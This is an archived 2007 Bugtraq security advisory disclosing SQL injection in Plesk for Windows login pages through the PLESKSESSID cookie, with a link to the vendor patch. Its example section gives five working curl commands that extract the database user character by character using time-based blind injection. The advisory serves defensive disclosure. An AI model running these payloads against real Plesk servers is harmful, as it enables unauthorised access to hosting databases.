[<prev] [next>] [day] [month] [year] [list]
Message-ID: <9392A06CB0FDC847B3A530B3DC174E7B0362EAD9@mse10be1.mse10.exchange.ms>
Date: Tue, 11 Sep 2007 19:45:07 -0400
From: "Nick Merritt" <nick.merritt@...kersafe.com>
To: <bugtraq@...urityfocus.com>
Subject: RE: ScanAlert Security Advisory
HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com
SWsoft Plesk for Windows - SQL Injection Vulnerability
Date: 9-11-07
Vendor: www.swsoft.com
Package: Plesk for Windows
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3
Credit: Nick I Merritt
Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major
Overview:
SWsoft Plesk is a comprehensive control panel solution used by leading
hosting providers worldwide for shared, virtual and dedicated hosting.
Vulnerability:
A SQL injection vulnerability exists in the Plesk application. Please
see the following:
SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"
Example: (Will extract the database user)
1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
2) Delay=5165.3031
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
3) Delay=5158.9512
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
4) Delay=5224.0980
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
5) Delay=5241.5251
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
Solution: Apply the following patches - http://kb.swsoft.com/en/2159
Powered by blists - more mailing lists